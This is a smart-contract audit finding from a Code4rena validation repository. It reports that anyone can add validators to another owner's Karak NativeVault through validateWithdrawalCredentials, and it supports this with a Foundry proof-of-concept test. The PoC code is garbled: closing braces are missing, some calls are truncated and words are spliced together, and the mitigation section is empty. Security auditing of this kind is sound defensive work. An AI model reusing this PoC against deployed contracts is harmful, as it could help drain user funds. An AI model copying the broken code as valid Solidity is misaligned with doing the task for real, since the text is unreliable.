code-423n4 / 2024-07-karak-validation

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Native Node Owner Lacks Control Over Validators Added to Their Vault #323

Closed c4-bot-2 closed 2 months ago

c4-bot-2 commented 2 months ago

Lines of code

Vulnerability details


A Native Node should have one or more validators added via the validateWithdrawalCredentials(...) function, a NativeVault function that ensures the validator’s withdrawal credentials point to the owner’s NativeNode. Validators play a vital role as all Ethereum yields from the validators accrue to the NativeNode, awarding shares to the owner. These shares are then delegated to the Operator of the NativeVault and are subject to slashing. The number of snapshots required to update the balance of the NativeNode is also proportional to the number of validators.

However, the current implementation of the Karak protocol allows anyone to call validateWithdrawalCredentials(...) and add any validator to the NativeVault without the owner's consent. This vulnerability permits an attacker to add malicious validators to the NativeVault, potentially leading to the loss of the owner’s funds and compromising the intevalidatorsgrity of the NativeNode. Additionally, the protocol lacks a mechanism to remove a validator from the NativeVault. While NativeVault updates the node owner's shares based on the balance changes on their NativeNode and the beacon chain balance of the validators, which in turn changes the amount the node owner has staked into an Operator, affecting the rewards given to them, it's essential to ensure that the owner has full control over the validators added to their NativeVault.

Proof of Concept

// SPDX-License-Identifier: SEE LICENSE IN LICENSE
pragma solidity ^0.8.25;

import "forge-std/Vm.sol";
import "forge-std/Test.sol";
import "forge-std/console.sol";
import "solady/src/utils/LibClone.sol";

import "../../src/Core.sol";
import "../../src/SlashStore.sol";
import "../../src/NativeNode.sol";
import "../../src/NativeVault.sol";
import "../helpers/ProxyDeployment.sol";
import "../../src/entities/VaultLib.sol";
import "../../src/interfaces/Constants.sol";
import "../../src/entities/NativeVaultLib.sol";
import "../../src/entities/BeaconProofsLib.sol";
import "../../src/interfaces/IKarakBaseVault.sol";

struct ValidatorFieldProof {
    bytes32 beaconStateRoot;
    bytes beaconStateRootProof;
    bytes32 blockHeaderRoot;
    uint64 slot;
    bytes32[] validatorFields;
    uint40 validatorIndex;
    bytes validatorProof;
    bytes32 validatorRoot;

struct WithdrawProof {
    uint256 amount;
    bytes32[] amountProof;
    bytes32 headerRoot;
    uint64 slot;
    uint256 validatorIndex;
    bytes32[] validatorIndexProof;
    uint8 withdrawalIndex;

contract NativeVaultTest is Test {
    Core core;
    NativeNode nativeNode;
    NativeVault nativeVault;

    address manager = address(11);
    address operator = address(12);
    address slashStore = address(13);
    address proxyAdmin = address(14);
    address slashingVetoCommittee = address(15);

    ValidatorFieldProof validatorFieldProof;
    ValidatorFieldProof updateBalanceValidatorFieldProof;
    ValidatorFieldProof paritalWithdrawValidator;
    WithdrawProof withdrawProof;
    WithdrawProof partialWithdrawProof;

    uint256 internal constant beaconGenesisTimestamp = 1606824023;
    address mockAddressOfNode = address(0x8e609AC80F4324E499A6eFD24f221a2CAA868224);
    bytes32 internal constant STATE_SLOT = 0x0e977c4f52771ae90b9a885786536a06e14de7815be95b6ed56cdea86f6fc300;
    bytes32 nodeToOwnerSlot = bytes32(uint256(STATE_SLOT) + 3);
    bytes32 ownerToNodeSlot = bytes32(uint256(STATE_SLOT) + 4);

    function setUp() public {
        // Setup core
        uint32 hookCallGasLimit = 500_000;
        uint32 hookGasBuffer = 40_000;
        uint32 supportsInterfaceGasLimit = 20_000;
        address nativeVaultImpl = address(new NativeVault());
        core = Core(ProxyDeployment.factoryDeploy(address(new Core()), proxyAdmin));
            nativeVaultImpl, manager, slashingVetoCommittee, hookCallGasLimit, supportsInterfaceGasLimit, hookGasBuffer
        address[] memory assets = new address[](1);
        assets[0] = Constants.DEAD_BEEF;
        address[] memory slashingHandlers = new address[](1);
        slashingHandlers[0] = slashStore;
        core.allowlistAssets(assets, slashingHandlers);

        // Setup NativeNode implementation
        address nativeNodeImpl = address(new NativeNode());

        // Deploy Vaults
        VaultLib.Config[] memory vaultConfigs = new VaultLib.Config[](1);
        vaultConfigs[0] = VaultLib.Config({
            asset: Constants.DEAD_BEEF,
            decimals: 18,
            operator: operator,
            name: "NativeTestVault",
            symbol: "NTV",
            extraData: abi.encode(address(manager), slashStore, address(nativeNodeImpl))

        IKarakBaseVault[] memory vaults = core.deployVaults(vaultConfigs, address(0));
        nativeVault = NativeVault(address(vaults[0]));

        string memory root = vm.projectRoot();
        string memory filename = "validator_field_data";
        string memory path = string.concat(root, "/test/fixtures/", filename, ".json");
        string memory file = vm.readFile(path);
        bytes memory parsed = vm.parseJson(file);
        validatorFieldProof = abi.decode(parsed, (ValidatorFieldProof));

        filename = "withdraw_data";
        path = string.concat(root, "/test/fixtures/", filename, ".json");
        file = vm.readFile(path);
        parsed = vm.parseJson(file);
        withdrawProof = abi.decode(parsed, (WithdrawProof));

        filename = "update_validator_validatorsdata";
        path = string.concat(root, "/test/fixtures/", filename, ".json");
        file = vm.readFile(path);
        parsed = vm.parseJson(file);
        updateBalanceValidatorFieldProof = abi.decode(parsed, (ValidatorFieldProof));

        filename = "partial_withdraw_data";
        path = string.concat(root, "/test/fixtures/", filename, ".json");
        file = vm.readFile(path);
        parsed = vm.parseJson(file);
        partialWithdrawProof = abi.decode(parsed, (WithdrawProof));

        filename = "partial_withdraw_validator_data";
        path = string.concat(root, "/test/fixtures/", filename, ".json");
        file = vm.readFile(path);
        parsed = vm.parseJson(file);
        paritalWithdrawValidator = abi.decode(parsed, (ValidatorFieldProof));

    function slotTimestamp(uint64 slot) public pure returns (uint256) {
        return beaconGenesisTimestamp + ((slot + 1) * 12);

    function timestamp_idx(uint256 timestamp) public pure returns (bytes32) {
        return bytes32(uint256(timestamp % Constants.BEACON_ROOTS_RING_BUFFER));

    function root_idx(uint256 timestamp) public pure returns (bytes32) {
        return bytes32(uint256(timestamp % Constants.BEACON_ROOTS_RING_BUFFER + Constants.BEACON_ROOTS_RING_BUFFER));

    function test_validateWithdrawalCredentials( address attacker) public {
        BeaconProofs.ValidatorProof memory validatorProof = BeaconProofs.ValidatorProof({
            validatorIndex: validatorFieldProof.validatorIndex,
            validatorRoot: validatorFieldProof.validatorRoot,
            proof: validatorFieldProof.validatorProof
        BeaconProofs.ValidatorFieldsProof[] memory validatorFieldsProof = new BeaconProofs.ValidatorFieldsProof[](1);
        validatorFieldsProof[0] = BeaconProofs.ValidatorFieldsProof({
            validatorFields: validatorFieldProof.validatorFields,
            validatorProof: validatorProof
        BeaconProofs.BeaconStateRootProof memory beaconStateRootProof = BeaconProofs.BeaconStateRootProof({
            timestamp: uint64(slotTimestamp(validatorFieldProof.slot)),
            beaconStateRoot: validatorFieldProof.beaconStateRoot,
            proof: validatorFieldProof.beaconStateRootProof

        vm.etch(address(mockAddressOfNode), type(NativeNode).runtimeCode);
            keccak256(abi.encode(address(this), ownerToNodeSlot)),
        nativeVault.validateWithdrawalCredentials(address(this), beaconStateRootProof, validatorFieldsProof);
        assertEq(nativeVault.activeValidatorCount(address(this)), 1);
        assertEq(nativeVault.balanceOf(address(this)), uint256(32 * 1 ether));


Tools Used

Recommended Mitigation Steps

Assessed type

Access Control